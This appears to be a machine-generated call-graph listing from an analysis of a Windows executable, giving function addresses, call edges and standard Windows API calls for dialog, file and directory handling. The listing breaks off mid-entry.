9b57d8 29262->29456 29264 991cee GetDlgItem 29265 991d0b 29264->29265 29266 991d1d 29264->29266 29267 9914a7 28 API calls 29265->29267 29457 991d64 29266->29457 29269 991d18 29267->29269 29270 991d4d 29269->29270 29271 991a66 26 API calls 29269->29271 29272 991d5a 29270->29272 29273 991a66 26 API calls 29270->29273 29271->29270 29274 9b5787 5 API calls 29272->29274 29273->29272 29275 991d61 29274->29275 29275->29037 29275->29163 29275->29227 29281 99eaff __EH_prolog3_GS 29276->29281 29277 99eb09 29278 9b5787 5 API calls 29277->29278 29279 99ebb6 29278->29279 29279->29118 29279->29119 29280 99eb84 29280->29277 29282 99efef 54 API calls 29280->29282 29281->29277 29281->29280 29283 99769f 45 API calls 29281->29283 29285 991a66 26 API calls 29281->29285 29470 99efef 29281->29470 29282->29277 29283->29281 29285->29281 29287 9a2232 SetCurrentDirectoryW 29286->29287 29288 9a2230 29286->29288 29287->29133 29288->29287 29290 993280 29289->29290 29504 992f0f 29290->29504 29293 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29294 99329d 29293->29294 29295 992f45 29294->29295 29296 992f55 _wcslen 29295->29296 29508 995962 29296->29508 29298 992f63 29298->29174 29302 99dea6 __EH_prolog3_GS 29299->29302 29300 99def4 29303 9a169a 47 API calls 29300->29303 29310 99df9e 29300->29310 29301 99df09 CreateFileW 29301->29300 29302->29300 29302->29301 29304 99df49 29303->29304 29306 99df6e 29304->29306 29308 99df59 CreateFileW 29304->29308 29309 99df56 29304->29309 29305 9b5787 5 API calls 29307 99dfdf 29305->29307 29306->29310 29517 9919a9 26 API calls 29306->29517 29307->29197 29307->29198 29308->29306 29309->29308 29310->29305 29313 99ddf8 29312->29313 29314 99de09 29312->29314 29313->29314 29316 99de0b 29313->29316 29317 99de04 29313->29317 29315 991a66 26 API calls 29314->29315 29318 99de18 29315->29318 29523 99de50 29316->29523 29518 99dfe2 29317->29518 29318->29211 29321->29162 29322->29176 29323->29189 29341 9b1d5e __EH_prolog3_GS 29324->29341 29326 9b349a 29327 991a66 26 API calls 29326->29327 29328 9b34a5 29327->29328 29329 9b5787 5 API calls 29328->29329 29330 9b10c5 29329->29330 29330->29204 29331 99769f 45 API calls 29331->29341 29332 9925a4 26 API calls 29332->29341 29333 9914a7 28 API calls 29333->29341 29335 991a66 26 API calls 29335->29341 29337 9a645a 28 API calls 29337->29341 29339 9b34ad 29549 9958cb 45 API calls 29339->29549 29341->29326 29341->29331 29341->29332 29341->29333 29341->29335 29341->29337 29341->29339 29544 9a62cd 30 API calls 2 library calls 29341->29544 29545 9af5b2 28 API calls 29341->29545 29546 99adaa CompareStringW 29341->29546 29547 9b44c0 26 API calls 29341->29547 29548 9b030a 28 API calls 29341->29548 29355 9b3c87 __EH_prolog3_catch_GS _wcslen 29354->29355 29550 9a6a89 29355->29550 29357 9b3cba 29554 997903 29357->29554 29366 9b5796 5 API calls 29367 9b10e0 29366->29367 29367->29215 30398 9aeaa6 29368->30398 29371 9b37bf GetWindow 29372 9b37d8 29371->29372 29375 9b3885 29371->29375 29372->29375 29376 9b37e5 GetClassNameW 29372->29376 29378 9b3809 GetWindowLongW 29372->29378 29379 9b386d GetWindow 29372->29379 29373 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29374 9b1266 29373->29374 29374->29019 29374->29020 29375->29373 30403 9a8da4 CompareStringW 29376->30403 29378->29379 29380 9b3819 SendMessageW 29378->29380 29379->29372 29379->29375 29380->29379 29381 9b382f GetObjectW 29380->29381 30404 9aeae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29381->30404 29383 9b3846 30405 9aeac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29383->30405 30406 9aef21 13 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29383->30406 29386 9b3857 SendMessageW DeleteObject 29386->29379 29388 991e0f 29387->29388 29389 991e11 SetWindowTextW 29387->29389 29388->29389 29389->29044 29391 9af2f9 29390->29391 29392 9af31e 29390->29392 30409 9a8da4 CompareStringW 29391->30409 29394 9af32c 29392->29394 29395 9af323 SHAutoComplete 29392->29395 29397 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29394->29397 29395->29394 29396 9af30c 29396->29392 29398 9af310 FindWindowExW 29396->29398 29399 9af337 29397->29399 29398->29392 29400 9afdd1 29399->29400 29401 9afded 29400->29401 29402 9920b0 30 API calls 29401->29402 29403 9afe27 29402->29403 30410 992dbb 29403->30410 29406 9afe4c 30417 99278b 29406->30417 29407 9afe43 29408 99232c 123 API calls 29407->29408 29410 9afe48 29408->29410 29413 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29410->29413 29412 99232c 123 API calls 29412->29410 29414 9afe77 29413->29414 29414->29075 29414->29078 29415->29040 29416->29059 29418 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29417->29418 29419 9b57a0 29418->29419 29419->29419 29421 9b0678 5 API calls 29420->29421 29422 9b358d GetDlgItem 29421->29422 29423 9b35ac 29422->29423 29424 9b35e4 SendMessageW SendMessageW 29422->29424 29429 9b35b7 ShowWindow SendMessageW SendMessageW 29423->29429 29425 9b3643 SendMessageW 29424->29425 29426 9b3624 29424->29426 29427 9b365b 29425->29427 29428 9b365d SendMessageW SendMessageW 29425->29428 29426->29425 29427->29428 29430 9b367f SendMessageW 29428->29430 29431 9b36a2 SendMessageW 29428->29431 29429->29424 29430->29431 29432 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29431->29432 29433 9b36c0 29432->29433 29433->29074 29434->29071 29435->29093 29436->29100 29437->29183 29438->29213 29439->29219 29440->29225 29441->29230 29442->29233 29444 992ea0 29443->29444 29445 992e93 29443->29445 29444->29248 29446 9912a7 26 API calls 29445->29446 29446->29444 29447->29170 29448->29227 29449->29132 29450->29108 29451->29134 29452->29122 29453->29104 29454->29258 29455->29256 29456->29264 29468 9b57d8 29457->29468 29459 991d70 GetWindowTextLengthW 29469 991bbd 28 API calls 29459->29469 29461 991dab GetWindowTextW 29462 9914a7 28 API calls 29461->29462 29463 991dca 29462->29463 29464 991ddd 29463->29464 29465 9912a7 26 API calls 29463->29465 29466 9b5787 5 API calls 29464->29466 29465->29464 29467 991de4 29466->29467 29467->29269 29468->29459 29469->29461 29471 99effb __EH_prolog3_GS 29470->29471 29472 99f02f 29471->29472 29473 99f01b CreateDirectoryW 29471->29473 29474 99ed0d 49 API calls 29472->29474 29473->29472 29475 99f0d0 29473->29475 29476 99f03b 29474->29476 29477 99f0df 29475->29477 29489 99f58b 29475->29489 29478 99f0e3 GetLastError 29476->29478 29480 9a169a 47 API calls 29476->29480 29482 9b5787 5 API calls 29477->29482 29478->29477 29481 99f063 29480->29481 29483 99f07d 29481->29483 29485 99f070 29481->29485 29486 99f073 CreateDirectoryW 29481->29486 29484 99f100 29482->29484 29488 99f0ad 29483->29488 29502 9919a9 26 API calls 29483->29502 29484->29281 29485->29486 29486->29483 29488->29475 29488->29478 29490 99f597 __EH_prolog3_GS 29489->29490 29491 99f5a4 SetFileAttributesW 29490->29491 29492 99f5b7 29491->29492 29501 99f622 29491->29501 29494 9a169a 47 API calls 29492->29494 29493 9b5787 5 API calls 29495 99f638 29493->29495 29496 99f5d7 29494->29496 29495->29477 29497 99f5e4 29496->29497 29498 99f5e7 SetFileAttributesW 29496->29498 29499 99f5f6 29496->29499 29497->29498 29498->29499 29499->29501 29503 9919a9 26 API calls 29499->29503 29501->29493 29502->29488 29503->29501 29505 992f2f 29504->29505 29506 992f26 29504->29506 29507 99120c 28 API calls 29505->29507 29506->29293 29507->29506 29509 995a3a 29508->29509 29510 995975 29508->29510 29516 9958cb 45 API calls 29509->29516 29514 995987 29510->29514 29515 993029 28 API calls 29510->29515 29514->29298 29515->29514 29517->29310 29519 99dfeb 29518->29519 29520 99e015 29518->29520 29519->29520 29529 99ec63 29519->29529 29520->29314 29524 99de76 29523->29524 29525 99de5c 29523->29525 29526 99de95 29524->29526 29543 99925b 109 API calls 29524->29543 29525->29524 29527 99de68 CloseHandle 29525->29527 29526->29314 29527->29524 29530 99ec6f __EH_prolog3_GS 29529->29530 29531 99ec7c DeleteFileW 29530->29531 29532 99ec8c 29531->29532 29540 99ecf4 29531->29540 29534 9a169a 47 API calls 29532->29534 29533 9b5787 5 API calls 29535 99e013 29533->29535 29536 99ecac 29534->29536 29535->29314 29537 99ecc8 29536->29537 29538 99ecb9 29536->29538 29539 99ecbc DeleteFileW 29536->29539 29537->29540 29542 9919a9 26 API calls 29537->29542 29538->29539 29539->29537 29540->29533 29542->29540 29543->29526 29544->29341 29545->29341 29546->29341 29547->29341 29548->29341 29551 9a6a99 _wcslen 29550->29551 29552 991be3 28 API calls 29551->29552 29553 9a6abb 29552->29553 29553->29357 29555 9a6a74 29554->29555 29556 9a6a89 28 API calls 29555->29556 29557 9a6a86 29556->29557 29558 99b03d 29557->29558 29559 99b049 __EH_prolog3_GS 29558->29559 29605 9a2815 29559->29605 29561 99b092 29611 99b231 29561->29611 29564 991a66 26 API calls 29565 99b120 29564->29565 29566 991a66 26 API calls 29565->29566 29567 99b128 29566->29567 29568 9b56f6 28 API calls 29567->29568 29569 99b13f 29568->29569 29616 9aa599 29569->29616 29571 99b172 29572 9b5787 5 API calls 29571->29572 29573 99b179 29572->29573 29574 99b3e1 29573->29574 29575 99b3ed __EH_prolog3_GS 29574->29575 29576 99b478 29575->29576 29579 99b484 29575->29579 29656 99f711 29575->29656 29577 991a66 26 API calls 29576->29577 29577->29579 29584 99b4e0 29579->29584 29623 99bc65 29579->29623 29580 99b529 29581 9b5787 5 API calls 29580->29581 29583 99b543 29581->29583 29586 99b194 29583->29586 29584->29580 29663 99204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29584->29663 30342 99d6bc 29586->30342 29589 991a66 26 API calls 29591 99b1e8 29589->29591 29593 991a66 26 API calls 29591->29593 29592 99b1d0 29592->29589 29594 99b1f3 29593->29594 29595 991a66 26 API calls 29594->29595 29596 99b1fe 29595->29596 30356 9a28aa 29596->30356 29598 99b206 29599 991a66 26 API calls 29598->29599 29600 99b20e 29599->29600 29601 991a66 26 API calls 29600->29601 29602 99b216 29601->29602 29603 99d869 26 API calls 29602->29603 29604 99b21d 29603->29604 29604->29366 29606 9a2821 __EH_prolog3 29605->29606 29607 9b56f6 28 API calls 29606->29607 29609 9a285f 29607->29609 29608 9b56f6 28 API calls 29610 9a2883 29608->29610 29609->29608 29610->29561 29612 9925a4 26 API calls 29611->29612 29613 99b23f 29612->29613 29614 9925a4 26 API calls 29613->29614 29615 99b118 29614->29615 29615->29564 29617 9aa5a5 __EH_prolog3 29616->29617 29618 9b56f6 28 API calls 29617->29618 29619 9aa5bf 29618->29619 29620 9aa5d6 29619->29620 29622 9a7445 112 API calls 29619->29622 29620->29571 29622->29620 29624 99bc80 29623->29624 29664 9920b0 29624->29664 29626 99bca7 29627 99bcba 29626->29627 29886 99e910 29626->29886 29631 99bcec 29627->29631 29674 9927e0 29627->29674 29630 99bce8 29630->29631 29698 992d41 160 API calls __EH_prolog3_GS 29630->29698 29863 99232c 29631->29863 29636 99bd14 29638 99be08 29636->29638 29639 997673 28 API calls 29636->29639 29699 99bec2 7 API calls 29638->29699 29641 99bd36 29639->29641 29890 9a1e54 46 API calls 2 library calls 29641->29890 29643 99be16 29645 99be76 29643->29645 29700 9a864f 29643->29700 29644 99f711 53 API calls 29653 99bd53 29644->29653 29645->29631 29703 9952d8 29645->29703 29715 99bf3d 29645->29715 29646 99bde8 29649 991a66 26 API calls 29646->29649 29651 99bded 29649->29651 29650 991a66 26 API calls 29650->29653 29654 991a66 26 API calls 29651->29654 29653->29644 29653->29646 29653->29650 29891 9a1e54 46 API calls 2 library calls 29653->29891 29654->29638 29657 9a1a9f 5 API calls 29656->29657 29659 99f723 29657->29659 29658 99f74b 29658->29575 29659->29658 30317 99f826 29659->30317 29662 99f738 FindClose 29662->29658 29663->29580 29665 9920bc __EH_prolog3 29664->29665 29666 9a2815 28 API calls 29665->29666 29667 9920e8 29666->29667 29668 9b56f6 28 API calls 29667->29668 29672 992193 29667->29672 29669 992180 29668->29669 29669->29672 29892 9976e7 29669->29892 29900 9a026f 29672->29900 29673 992227 __cftof 29673->29626 29675 9927ec __EH_prolog3 29674->29675 29676 992838 29675->29676 29695 99298b 29675->29695 29914 9911dd 29675->29914 29678 9929a9 29676->29678 29682 9929b6 29676->29682 29923 99204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29678->29923 29680 9952d8 133 API calls 29685 9929f4 29680->29685 29681 992882 29696 99e850 111 API calls 29681->29696 29682->29680 29682->29695 29683 992a3c 29687 992a6f 29683->29687 29683->29695 29924 99204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29683->29924 29685->29683 29686 9952d8 133 API calls 29685->29686 29686->29685 29687->29695 29697 99e850 111 API calls 29687->29697 29688 992995 29690 992e8b 26 API calls 29688->29690 29689 992986 29691 992e8b 26 API calls 29689->29691 29690->29676 29691->29695 29692 9928ad 29692->29688 29692->29689 29693 9952d8 133 API calls 29694 992ac0 29693->29694 29694->29693 29694->29695 29695->29630 29696->29692 29697->29694 29698->29636 29699->29643 29927 9b4300 29700->29927 29704 9952e8 29703->29704 29705 9952e4 29703->29705 29714 99e850 111 API calls 29704->29714 29705->29645 29706 9952fa 29707 995323 29706->29707 29708 995315 29706->29708 29954 993d9d 131 API calls 3 library calls 29707->29954 29710 995355 29708->29710 29953 9948aa 118 API calls 2 library calls 29708->29953 29710->29645 29712 995321 29712->29710 29955 99344b 89 API calls 29712->29955 29714->29706 29716 99bf95 29715->29716 29722 99bfc4 29716->29722 29781 99c2fd 29716->29781 30053 9acdb4 135 API calls __EH_prolog3_GS 29716->30053 29717 99d2e5 29720 99d2ea 29717->29720 29721 99d331 29717->29721 29719 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29723 99d327 29719->29723 29720->29781 30124 99ab88 185 API calls 29720->30124 29721->29781 30125 9acdb4 135 API calls __EH_prolog3_GS 29721->30125 29722->29717 29725 99bfeb 29722->29725 29722->29781 29723->29645 29725->29781 29956 997e1b 29725->29956 29728 99c0c8 29968 9a106b 29728->29968 29732 99c151 29736 99c16f 29732->29736 30055 9a2095 45 API calls __EH_prolog3_GS 29732->30055 29734 99c269 29743 99c29b 29734->29743 30056 9919a9 26 API calls 29734->30056 29735 99d205 29737 99c948 29735->29737 29775 99c743 29735->29775 29762 99c239 29736->29762 30058 9a0ddb 28 API calls 29736->30058 29752 99c97a 29737->29752 30091 9919a9 26 API calls 29737->30091 29739 99c374 29739->29735 29740 99c3ea 29739->29740 29741 99c3cf 29739->29741 29756 99c409 29740->29756 30060 99b92d 56 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29740->30060 29744 991a66 26 API calls 29741->29744 29743->29781 30057 9919a9 26 API calls 29743->30057 29749 99c3da 29744->29749 29754 991a66 26 API calls 29749->29754 29751 99d276 29751->29781 30123 9919a9 26 API calls 29751->30123 29752->29781 30092 9919a9 26 API calls 29752->30092 29754->29781 29755 99c4ea 29978 99b2ee 29755->29978 29756->29755 29758 99f711 53 API calls 29756->29758 29757 99c33d _wcslen 30059 99f103 52 API calls 2 library calls 29757->30059 29769 99c49b 29758->29769 29762->29734 29762->29739 29763 99c5c2 29764 99c7d8 29763->29764 29768 99c5cf 29763->29768 30069 9a2a36 115 API calls 29764->30069 29765 991a66 26 API calls 29765->29755 29805 99c62c 29768->29805 30063 9957c0 28 API calls 2 library calls 29768->30063 29769->29765 29772 99c501 29779 99c551 29772->29779 30061 9919a9 26 API calls 29772->30061 29773 99c8f0 29782 99c9eb 29773->29782 29799 99c8ff 29773->29799 29774 99c830 29774->29773 29783 99c859 29774->29783 29775->29751 30122 9919a9 26 API calls 29775->30122 29779->29781 30062 9919a9 26 API calls 29779->30062 29781->29719 29795 99c874 29782->29795 29984 99b345 29782->29984 29788 99ed0d 49 API calls 29783->29788 29790 99ca64 29783->29790 29783->29795 29784 99c940 29785 99ddc7 114 API calls 29784->29785 29785->29737 29787 99d1f2 29791 99ddc7 114 API calls 29787->29791 29792 99c8b3 29788->29792 29789 99ca01 29793 99ca05 29789->29793 29990 99b778 29789->29990 29790->29787 29815 99cac5 29790->29815 30093 99e152 29790->30093 29791->29735 29792->29795 30071 99d8b8 29792->30071 29796 99ddc7 114 API calls 29793->29796 29795->29790 29795->29793 29800 99b345 90 API calls 29795->29800 29796->29775 29799->29784 30090 99b544 144 API calls __EH_prolog3_GS 29799->30090 29807 99ca5e 29800->29807 29803 99cb15 29809 99fd70 28 API calls 29803->29809 29804 99c77a 30068 9932d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29804->30068 29805->29775 29805->29804 29811 99c781 29805->29811 30064 99b015 28 API calls 29805->30064 30065 9a2a36 115 API calls 29805->30065 30066 9932d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29805->30066 30067 99b8ed 89 API calls 29805->30067 29807->29790 29807->29793 29826 99cb2f 29809->29826 29811->29774 30070 99ede9 119 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29811->30070 29813 99cab7 30097 999653 109 API calls 29813->30097 30020 99fd70 29815->30020 29816 99cc21 29817 99cf27 29816->29817 29818 99cc76 29816->29818 29820 99cf39 29817->29820 29821 99cf50 29817->29821 29844 99ccb5 29817->29844 29819 99cd33 29818->29819 29823 99cc94 29818->29823 30101 9a22b9 28 API calls 29819->30101 30108 99d771 29820->30108 30024 9a9625 29821->30024 29828 99ccd8 29823->29828 29836 99cca3 29823->29836 29826->29816 30098 99e39d 8 API calls 29826->30098 29827 99cd69 29830 9a106b 45 API calls 29827->29830 29828->29844 30100 99a7a2 142 API calls 29828->30100 29829 99cf73 30040 9a94ea 29829->30040 29834 99cd76 29830->29834 30102 99b92d 56 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29834->30102 30099 9932d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29836->30099 29839 99cdaf 29840 99cddd 29839->29840 29841 99cdcd 29839->29841 29842 99cddf 29839->29842 29847 99ce3e 29840->29847 30105 9919a9 26 API calls 29840->30105 30103 99a496 119 API calls 29841->30103 30104 99d3d7 135 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29842->30104 29849 99cf15 29844->29849 30107 99fd28 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29844->30107 29847->29844 30106 9919a9 26 API calls 29847->30106 29852 99d044 29849->29852 30119 9932d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29849->30119 29851 99d115 30048 99e772 29851->30048 29852->29787 29852->29851 29855 99d161 29852->29855 30047 99e8d9 SetEndOfFile 29852->30047 29855->29787 29857 99f58b 49 API calls 29855->29857 29856 99d159 29858 99de50 110 API calls 29856->29858 29859 99d1d2 29857->29859 29858->29855 29859->29787 30120 9932d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29859->30120 29861 99d1e8 30121 999500 109 API calls __EH_prolog3_GS 29861->30121 29864 99233e 29863->29864 29869 992350 29863->29869 29864->29869 30313 9923b0 26 API calls 29864->30313 29865 991a66 26 API calls 29866 992369 29865->29866 30314 992ed0 26 API calls 29866->30314 29869->29865 29870 992374 30315 9924d9 26 API calls 29870->30315 29887 99e927 29886->29887 29888 99e931 29887->29888 30316 9993d7 110 API calls __EH_prolog3_GS 29887->30316 29888->29627 29890->29653 29891->29653 29893 9976f3 __EH_prolog3 29892->29893 29908 9a0aaf GetCurrentProcess GetProcessAffinityMask 29893->29908 29895 9976fd 29909 9a4f2b 28 API calls __EH_prolog3 29895->29909 29897 997874 29910 997cba GetCurrentProcess GetProcessAffinityMask 29897->29910 29899 997891 29899->29672 29901 9a028f __cftof 29900->29901 29911 9a0152 29901->29911 29904 991a66 26 API calls 29905 9a02b4 29904->29905 29906 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29905->29906 29907 9a02bf 29906->29907 29907->29673 29908->29895 29909->29897 29910->29899 29912 9925a4 26 API calls 29911->29912 29913 9a01c7 29912->29913 29913->29904 29915 9911e8 29914->29915 29916 991206 29914->29916 29918 9b56f6 28 API calls 29915->29918 29926 991a25 27 API calls 2 library calls 29916->29926 29919 9911ee 29918->29919 29921 9911f5 29919->29921 29925 9bac9e 26 API calls _abort 29919->29925 29920 99120b 29921->29681 29923->29695 29924->29687 29926->29920 29928 9b430c __EH_prolog3_GS 29927->29928 29929 9a2117 45 API calls 29928->29929 29930 9b432f 29929->29930 29931 9a4318 53 API calls 29930->29931 29932 9b4342 29931->29932 29933 9a6a25 53 API calls 29932->29933 29934 9b434c 29933->29934 29935 991a66 26 API calls 29934->29935 29936 9b435b 29935->29936 29943 9b3ec5 29936->29943 29939 991a66 26 API calls 29940 9b4375 29939->29940 29941 9b5787 5 API calls 29940->29941 29942 9a8665 29941->29942 29942->29645 29944 9b3ed1 __EH_prolog3_GS 29943->29944 29945 9914a7 28 API calls 29944->29945 29946 9b3edd 29945->29946 29947 9b3572 21 API calls 29946->29947 29948 9b3eec 29947->29948 29949 991a66 26 API calls 29948->29949 29950 9b3ef4 29949->29950 29951 9b5787 5 API calls 29950->29951 29952 9b3ef9 29951->29952 29952->29939 29953->29712 29954->29712 29955->29710 29957 997e27 __EH_prolog3_GS 29956->29957 30126 997bfc 29957->30126 29959 997e68 29964 997ed2 29959->29964 29965 997e6c 29959->29965 29967 997ebe 29959->29967 30131 997bd6 30 API calls 29959->30131 29960 9b5787 5 API calls 29961 997ecf 29960->29961 29961->29728 29963 991a66 26 API calls 29963->29965 29964->29967 30132 99adaa CompareStringW 29964->30132 29965->29960 29967->29963 29977 9a1095 29968->29977 29969 9a1256 29970 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29969->29970 29972 99c11b 29970->29972 29971 99769f 45 API calls 29973 9a1241 29971->29973 29972->29736 30054 9a2095 45 API calls __EH_prolog3_GS 29972->30054 29974 9925a4 26 API calls 29973->29974 29975 9a124d 29974->29975 29976 991a66 26 API calls 29975->29976 29976->29969 29977->29969 29977->29971 29979 99b303 29978->29979 29980 99b33b 29979->29980 30175 999635 89 API calls 29979->30175 29980->29763 29980->29772 29982 99b333 30176 99204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29982->30176 29985 99b368 29984->29985 29987 99b39e 29984->29987 29985->29987 30177 9a85fd 75 API calls 29985->30177 29987->29789 29988 99b39a 29988->29987 30178 9932a1 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29988->30178 29991 99b784 __EH_prolog3_GS 29990->29991 29992 99b8e3 29991->29992 29993 99d8b8 138 API calls 29991->29993 29994 9b5787 5 API calls 29992->29994 29995 99b7ef 29993->29995 29996 99b8ea 29994->29996 29995->29992 30179 999283 109 API calls 29995->30179 29996->29795 29998 99b817 29999 99ed0d 49 API calls 29998->29999 30000 99b81d 29999->30000 30001 99b838 30000->30001 30003 99ed1f 49 API calls 30000->30003 30181 9a1a27 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 30001->30181 30006 99b827 30003->30006 30004 99b83e 30004->29992 30182 99204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 30004->30182 30006->30001 30180 9932a1 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 30006->30180 30007 99b850 30009 997673 28 API calls 30007->30009 30011 99b859 30009->30011 30010 99b88d 30012 99eaf3 54 API calls 30010->30012 30016 99b8c9 30010->30016 30011->30010 30183 99ede9 119 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 30011->30183 30014 99b8a1 30012->30014 30015 99d8b8 138 API calls 30014->30015 30017 99b8c5 30015->30017 30018 991a66 26 API calls 30016->30018 30017->30016 30184 999283 109 API calls 30017->30184 30018->29992 30021 99fd7e 30020->30021 30023 99fd88 30020->30023 30022 9b56f6 28 API calls 30021->30022 30022->30023 30023->29803 30025 9a9639 30024->30025 30026 9a975f 30025->30026 30029 9a9644 30025->30029 30028 9b734a CallUnexpected RaiseException 30026->30028 30027 9a9739 30027->29829 30034 9a970b 30028->30034 30029->30027 30030 9a96ed 30029->30030 30032 9bd08c ___std_exception_copy 21 API calls 30029->30032 30029->30034 30030->30027 30033 9a971f 30030->30033 30030->30034 30031 9b734a CallUnexpected RaiseException 30038 9a97a3 __EH_prolog3 __cftof 30031->30038 30032->30030 30033->30027 30185 9a9556 89 API calls 4 library calls 30033->30185 30034->30031 30036 9a9896 30036->29829 30037 9bd08c ___std_exception_copy 21 API calls 30037->30038 30038->30036 30038->30037 30186 999384 89 API calls 30038->30186 30041 9a94f3 30040->30041 30042 9a951d 30041->30042 30043 9a951f 30041->30043 30044 9a9515 30041->30044 30042->29844 30202 9aabc8 155 API calls 30043->30202 30187 9ab76f 30044->30187 30047->29851 30049 99e783 30048->30049 30052 99e792 30048->30052 30050 99e789 FlushFileBuffers 30049->30050 30049->30052 30050->30052 30051 99e80f SetFileTime 30051->29856 30052->30051 30053->29722 30054->29732 30055->29736 30056->29743 30057->29781 30058->29757 30059->29762 30060->29756 30061->29779 30062->29781 30063->29805 30064->29805 30065->29805 30066->29805 30067->29805 30068->29811 30069->29811 30070->29774 30072 99d8c5 30071->30072 30073 99ed0d 49 API calls 30072->30073 30082 99d8d7 30073->30082 30074 99d93e 30075 99d953 30074->30075 30077 99de9a 49 API calls 30074->30077 30080 99eaf3 54 API calls 30075->30080 30085 99d957 30075->30085 30076 99d8e8 30076->30082 30281 99d990 125 API calls __EH_prolog3_GS 30076->30281 30077->30075 30081 99d973 30080->30081 30083 99d982 30081->30083 30084 99d977 30081->30084 30082->30074 30082->30076 30082->30085 30087 99ed0d 49 API calls 30082->30087 30282 9a846c 61 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 30082->30282 30283 9992e6 RaiseException CallUnexpected 30082->30283 30088 99ec63 49 API calls 30083->30088 30086 99de9a 49 API calls 30084->30086 30085->29795 30086->30085 30087->30082 30088->30085 30090->29784 30091->29752 30092->29781 30094 99caa5 30093->30094 30095 99e15b GetFileType 30093->30095 30094->29815 30096 9932d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 30094->30096 30095->30094 30096->29813 30097->29815 30098->29816 30099->29844 30100->29844 30101->29827 30102->29839 30103->29840 30104->29840 30105->29847 30106->29844 30107->29849 30109 99d77d __EH_prolog3 30108->30109 30110 9911dd 28 API calls 30109->30110 30111 99d788 30110->30111 30112 9a2af9 150 API calls 30111->30112 30118 99d7b1 30112->30118 30113 99d804 30115 99d828 30113->30115 30292 9919a9 26 API calls 30113->30292 30115->29844 30117 9a2af9 150 API calls 30117->30118 30118->30113 30118->30117 30284 9a2ce5 30118->30284 30119->29852 30120->29861 30121->29787 30122->29751 30123->29781 30124->29781 30125->29781 30133 99790e 30126->30133 30128 997c1d 30128->29959 30130 99790e 47 API calls 30130->30128 30131->29959 30132->29967 30134 9a106b 45 API calls 30133->30134 30135 997989 _wcslen 30134->30135 30142 9a2117 45 API calls 30135->30142 30143 997673 28 API calls 30135->30143 30145 9a106b 45 API calls 30135->30145 30146 99769f 45 API calls 30135->30146 30147 991a66 26 API calls 30135->30147 30149 997bc2 30135->30149 30153 997b1b 30135->30153 30155 9a1a9f 30135->30155 30159 991b63 30135->30159 30163 997bd6 30 API calls 30135->30163 30136 997b92 30139 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 30136->30139 30138 997b4a 30138->30136 30165 9919a9 26 API calls 30138->30165 30141 997bbb 30139->30141 30141->30128 30141->30130 30142->30135 30143->30135 30145->30135 30146->30135 30147->30135 30150 991a66 26 API calls 30149->30150 30151 997bc7 30150->30151 30152 991a66 26 API calls 30151->30152 30152->30153 30153->30138 30164 9919a9 26 API calls 30153->30164 30156 9a1ab1 30155->30156 30166 9996e5 30156->30166 30160 991b8e 30159->30160 30161 991b6f 30159->30161 30174 9913f7 28 API calls 30160->30174 30161->30135 30163->30135 30164->30138 30165->30136 30167 9996f1 _wcslen 30166->30167 30170 9990f4 30167->30170 30173 999137 __cftof 30170->30173 30171 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 30172 9991a9 30171->30172 30172->30135 30173->30171 30174->30161 30175->29982 30176->29980 30177->29988 30178->29987 30179->29998 30180->30001 30181->30004 30182->30007 30183->30010 30184->30016 30185->30027 30186->30038 30203 9a97a4 30187->30203 30190 9abb9c 30233 9aa814 129 API calls __InternalCxxFrameHandler 30190->30233 30192 9abbb5 __InternalCxxFrameHandler 30193 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 30192->30193 30194 9abbfc 30193->30194 30194->30042 30195 9ab78e __InternalCxxFrameHandler 30195->30190 30208 9a2af9 30195->30208 30219 9a7590 30195->30219 30225 9aa008 150 API calls 30195->30225 30226 9abc05 150 API calls 30195->30226 30227 9a77cf 30195->30227 30231 9a9a2b 129 API calls 30195->30231 30232 9ac27f 155 API calls 30195->30232 30202->30042 30206 9a97b0 __EH_prolog3 __cftof 30203->30206 30204 9a9896 30204->30195 30205 9bd08c ___std_exception_copy 21 API calls 30205->30206 30206->30204 30206->30205 30234 999384 89 API calls 30206->30234 30215 9a2b0f __InternalCxxFrameHandler 30208->30215 30209 